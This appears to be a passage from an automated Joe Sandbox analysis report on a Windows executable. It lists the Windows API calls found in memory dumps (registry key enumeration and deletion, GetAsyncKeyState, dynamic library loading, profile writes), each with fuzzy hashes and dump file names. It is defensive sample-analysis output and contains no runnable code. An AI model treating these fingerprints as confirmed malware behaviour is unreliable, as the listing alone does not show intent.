          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: ItemMenu$Info_wcslen$Default_malloc_wcscpy
          • String ID: 0
          • API String ID: 621800784-4108050209
          • Opcode ID: cb13e9d3fa38a0009770c7b5cee6960bfd97da7f8a5e3da7fc4d2edba2eebb8a
          • Instruction ID: 8916cda2fcff4f3da81aa675480f1736598f59ba0f795e6899437ff2d0190f01
          • Opcode Fuzzy Hash: cb13e9d3fa38a0009770c7b5cee6960bfd97da7f8a5e3da7fc4d2edba2eebb8a
          • Instruction Fuzzy Hash: E061EDB1604301AAD710EF69D885B6B77A4AF99315F04493FF98087292E7BCD84CC79B
          APIs
            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
          • SetErrorMode.KERNEL32 ref: 004781CE
          • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00478387
            • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
          • SetErrorMode.KERNEL32(?), ref: 00478270
          • SetErrorMode.KERNEL32(?), ref: 00478340
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: ErrorMode$AttributesFile_memmove_wcslen
          • String ID: \VH
          • API String ID: 3884216118-234962358
          • Opcode ID: 19010524253a81d9893578267122348c8a75944f195fb855a56c059a8a119acf
          • Instruction ID: 3f1cdca54a202f1bd1938e87a451cd9606667cca5306a7eaf6ab6c0a6d737147
          • Opcode Fuzzy Hash: 19010524253a81d9893578267122348c8a75944f195fb855a56c059a8a119acf
          • Instruction Fuzzy Hash: F9619F715043019BC310EF25C585A5BB7E0BFC8708F04896EFA996B392CB76ED45CB96
          APIs
          • GetMenuItemInfoW.USER32 ref: 00448539
          • IsMenu.USER32(?), ref: 0044854D
          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0044859B
          • DrawMenuBar.USER32 ref: 004485AF
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: Menu$Item$DrawInfoInsert
          • String ID: 0
          • API String ID: 3076010158-4108050209
          • Opcode ID: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
          • Instruction ID: 7b58e0297b022ec9ba855d833b0382692745775969200e6848d17b537ef0d45f
          • Opcode Fuzzy Hash: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
          • Instruction Fuzzy Hash: 1F417975A00209AFEB10DF55D884B9FB7B5FF59300F14852EE9059B390DB74A845CFA8
          APIs
            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
          • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00469D69
          • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00469D7C
          • SendMessageW.USER32(?,00000189,00000000,00000000), ref: 00469DAC
            • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
            • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: MessageSend$_memmove_wcslen
          • String ID: ComboBox$ListBox
          • API String ID: 1589278365-1403004172
          • Opcode ID: ed37c04a59d62d2c516afafeaf2eae1a0d3a52e2d78df33c57453b62537e39be
          • Instruction ID: b025c67d46b61e1fa51b41144ded2117d8c1ab71acdc4e5cb50a5164a05e923b
          • Opcode Fuzzy Hash: ed37c04a59d62d2c516afafeaf2eae1a0d3a52e2d78df33c57453b62537e39be
          • Instruction Fuzzy Hash: 8D31287160010477DB10BB69CC45BEF775C9F86324F10852FF918AB2D1DABC9E4583A6
          APIs
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: Handle
          • String ID: nul
          • API String ID: 2519475695-2873401336
          • Opcode ID: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
          • Instruction ID: 058e2060cb23de8d889deff533ab301820a4ae088d702658d54b05e79d5a48de
          • Opcode Fuzzy Hash: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
          • Instruction Fuzzy Hash: 84319571500204ABEB20DF68DC46BEB77A8EF04721F104A4EFD50973D1E7B59A50CBA5
          APIs
          • GetStdHandle.KERNEL32(000000F6), ref: 0044337D
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: Handle
          • String ID: nul
          • API String ID: 2519475695-2873401336
          • Opcode ID: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
          • Instruction ID: 7fb8f1e98e57093f7bc771e71f756598ee5282d4f5ffeaa4ddc08f3ab3272662
          • Opcode Fuzzy Hash: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
          • Instruction Fuzzy Hash: 05219331600204ABE720DF689C49FAB77A8EF55731F20474EFDA0972D0EBB59A50C795
          APIs
          • LoadStringW.USER32(?,00000065,?,0000007F), ref: 0042723B
            • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
            • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
          • _wcsncpy.LIBCMT ref: 00401C41
          • _wcscpy.LIBCMT ref: 00401C5D
          • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: IconLoadNotifyShell_String_memmove_wcscpy_wcslen_wcsncpy
          • String ID: Line:
          • API String ID: 1874344091-1585850449
          • Opcode ID: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
          • Instruction ID: 22c0e507134e40740d6fd31dbafdd21c3b8ff828be9a92102ab360472f74cad7
          • Opcode Fuzzy Hash: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
          • Instruction Fuzzy Hash: EB31A1715083459BD320EB61DC45BDA77E8BF85318F04093EF588931E1E7B8AA49C75E
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID:
          • String ID: SysAnimate32
          • API String ID: 0-1011021900
          • Opcode ID: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
          • Instruction ID: b1a10ecfd0a3fc3d2af2854cd73c9de1262d8b9fd4b2252518a975ef6c54cff1
          • Opcode Fuzzy Hash: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
          • Instruction Fuzzy Hash: 0D21C975600205ABFB149EA9EC81FAB73DCEB95324F20471BF711972C0D279EC518768
          APIs
            • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
            • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
            • Part of subcall function 0043646A: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
            • Part of subcall function 0043646A: GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
            • Part of subcall function 0043646A: GetCurrentThreadId.KERNEL32(00000000), ref: 004364A3
            • Part of subcall function 0043646A: AttachThreadInput.USER32(00000000), ref: 004364AA
          • GetFocus.USER32 ref: 0046157B
            • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364C3
            • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364CF
          • GetClassNameW.USER32(?,?,00000100), ref: 004615C4
          • EnumChildWindows.USER32 ref: 004615EF
          • __swprintf.LIBCMT ref: 00461608
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: Thread$Parent$AttachChildClassCurrentEnumFocusInputMessageNameProcessSendTimeoutWindowWindows__swprintf_memmove_wcslen
          • String ID: %s%d
          • API String ID: 2645982514-1110647743
          • Opcode ID: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
          • Instruction ID: 8eac61321038dbd32bfe14263504560db7c98c8fbeeeb2eb49a46d34c9d63f73
          • Opcode Fuzzy Hash: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
          • Instruction Fuzzy Hash: 272180756007096BD610AF69DC89FAF73A8FB88704F00841FF918A7241DAB8A9418B69
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
          • Instruction ID: b0f148a0463f8e77612455c4d0488571574065cadd758f34d18f988e9301810f
          • Opcode Fuzzy Hash: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
          • Instruction Fuzzy Hash: 2A819F74600604BFEB24CF95C994FBB7B68EF59350F10804EF8959B341E6B8AC45CB6A
          APIs
          • GetCurrentProcessId.KERNEL32(?), ref: 0047584D
          • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0047585B
          • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0047587F
          • CloseHandle.KERNEL32(00000000), ref: 00475A4D
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: Process$CloseCountersCurrentHandleOpen
          • String ID:
          • API String ID: 3488606520-0
          • Opcode ID: 7fd3602cd651dad3c5defef94bf6212d7269dc29ca20ef2dbd8ae2937eb4da43
          • Instruction ID: 747e8e91012d04cc7bcfbda4f2b49d0ca9967bea8b965680eccea6cdbc9dea0c
          • Opcode Fuzzy Hash: 7fd3602cd651dad3c5defef94bf6212d7269dc29ca20ef2dbd8ae2937eb4da43
          • Instruction Fuzzy Hash: 82817170A047029FD310DF65C981B4BBBE1BF84704F10892EF6999B3D2DA75E944CB96
          APIs
            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B5B5
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: ConnectRegistry_memmove_wcslen
          • String ID:
          • API String ID: 15295421-0
          • Opcode ID: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
          • Instruction ID: 481e56be03c4cee60d8ca92471cfa4b3875eab78bcfcbf7fb961631f720e0f99
          • Opcode Fuzzy Hash: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
          • Instruction Fuzzy Hash: 7D515F71208301ABD304EF65C885E5BB7A8FF88704F10892EB54597291D774E945CBA6
          APIs
          • LoadLibraryW.KERNEL32(00000000,?,?,?), ref: 0046485D
          • GetProcAddress.KERNEL32(?,?,?,?,?,?,?), ref: 004648F7
          • GetProcAddress.KERNEL32(?,00000000,?,?,?), ref: 00464916
          • GetProcAddress.KERNEL32(?,?,?,?,00000041,?,?,?), ref: 0046495A
          • FreeLibrary.KERNEL32(?,?,?,?), ref: 0046497C
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: AddressProc$Library$FreeLoad
          • String ID:
          • API String ID: 2449869053-0
          • Opcode ID: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
          • Instruction ID: 8919579e2c9fc9b2d94c4928dd3202a5bdd7863bc063e44bf2a6fba2f1eed130
          • Opcode Fuzzy Hash: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
          • Instruction Fuzzy Hash: 2351BF756002049FCB00EFA4C985A9EB7B4EF88304F14856EFD05AB392DB79ED45CB99
          APIs
          • GetCursorPos.USER32(?), ref: 004563A6
          • ScreenToClient.USER32(?,?), ref: 004563C3
          • GetAsyncKeyState.USER32 ref: 00456400
          • GetAsyncKeyState.USER32 ref: 00456410
          • GetWindowLongW.USER32(?,000000F0), ref: 00456466
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: AsyncState$ClientCursorLongScreenWindow
          • String ID:
          • API String ID: 3539004672-0
          • Opcode ID: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
          • Instruction ID: 60090bce41a6de58f2ab96a8453d1e3558661e38fd0c916b19f374a884add038
          • Opcode Fuzzy Hash: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
          • Instruction Fuzzy Hash: 49414C74504204BBDB24CF65C884EEFBBB8EB46326F60464EFC6593281CB34A944CB68
          APIs
          • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D438
          • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D44D
          • Sleep.KERNEL32(0000000A), ref: 0047D455
          • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D460
          • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D56A
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: Interlocked$DecrementIncrement$Sleep
          • String ID:
          • API String ID: 327565842-0
          • Opcode ID: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
          • Instruction ID: e00c67d4cb89bf1d5311357fb713975cbca1e0cfcee7190b0451066ade77f289
          • Opcode Fuzzy Hash: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
          • Instruction Fuzzy Hash: CC412571A002055FEB10DF65CD84AEE7774EF45304B10852EF609A7351E738EE46CB99
          APIs
          • GetPrivateProfileSectionW.KERNEL32 ref: 0045C44F
          • GetPrivateProfileSectionW.KERNEL32 ref: 0045C477
          • WritePrivateProfileSectionW.KERNEL32 ref: 0045C4C3
          • WritePrivateProfileStringW.KERNEL32 ref: 0045C4E7
          • WritePrivateProfileStringW.KERNEL32 ref: 0045C4F6
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: PrivateProfile$SectionWrite$String
          • String ID:
          • API String ID: 2832842796-0
          • Opcode ID: 12898e1615777fead91a8fd76fcaa27e55a74ab7648f182e00885701e93a2c2c
          • Instruction ID: 1eb5009190fa999c36a74edd43b7bd9b51adbc8f8691a9c3f5840d50e9073e8b
          • Opcode Fuzzy Hash: 12898e1615777fead91a8fd76fcaa27e55a74ab7648f182e00885701e93a2c2c
          • Instruction Fuzzy Hash: D1413075A00209BFDB10EFA1DC85FAAB7A8BF44305F10855EF9049B292DA79EE44CB54
          APIs
          • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00441CA9
          • RegOpenKeyExW.ADVAPI32 ref: 00441CDD
          • RegCloseKey.ADVAPI32(?), ref: 00441CFE
          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00441D40
          • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00441D6E
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: Enum$CloseDeleteOpen
          • String ID:
          • API String ID: 2095303065-0
